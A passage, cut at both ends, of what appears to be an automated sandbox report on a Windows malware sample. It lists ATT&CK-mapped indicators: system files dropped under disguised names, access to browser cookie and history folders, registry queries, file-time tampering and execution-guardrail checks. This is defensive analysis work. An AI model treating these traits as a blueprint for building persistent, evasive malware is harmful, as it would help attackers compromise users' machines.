was detected as \"Microsoft visual C++ 5.0\"\n \"notepad_.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"rundll32.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"_.exe\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\MFC42.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\ODBC32.dll\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\MFC42LOC.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\MFC42LOC.DLL.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\IEXPLORE.EXE\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\IEXPLORE .EXE\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\internat.exe\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\rundll32.exe\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\IEXPLORE.EXE\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\IEXPLORE .EXE\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mssysint.exe\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspsint.exe\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbint.exe\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbbase.dll\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbhook.dll\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\psinthk.dll\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\psintbs.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" reads file \"c:\\fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\MFC42.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\ODBC32.dll\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\ODBC32.dll\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\version.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\odbcint.dll\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42LOC.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42LOC.DLL.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\IEXPLORE.EXE\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\IEXPLORE .EXE\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"rundll32.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" writes file \"c:\\windows\\system32\\¢«.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" touched file \"C:\\Windows\\System32\\¢«.exe\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" touched file \"C:\\Windows\\System32\\notepad¢¬.exe\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" touched file \"C:\\Windows\\system\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" touched file \"C:\\Windows\\system\\rundll32.exe\"\n \"rundll32.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"rundll32.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\History\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" queries basic process information of the \"C:\\Windows\\system\\rundll32.exe\" (UID: 6120)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\WINSPOOL.DRV\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\rundll32.exe.Local\\\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\RUNDLL32.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" connecting to \"\\ThemeApiPort\"\n \"rundll32.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"notepad_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rundll32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\system\\rundll32.exe]- [targetUID: 00000000-00006120]\n \"_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"RUNDLL32.EXE.67A47CFD.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"FE3954FDF5AF164D8ACD2DB166ACA208FC6EBD22D730EF173174A7B8FF70842F\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\MSIPV\"; Key: \"MAINVER\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Contains ability to delay the execution of current thread", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-338", "type": 2, "relevance": 1, "name": "Contains ability to perform Base64 encoding/decoding", "description": "Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n file/memory contains long string with (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; File: \"notepad_.exe\")\n file/memory contains long string with (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; File: \"notepad_.exe\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: 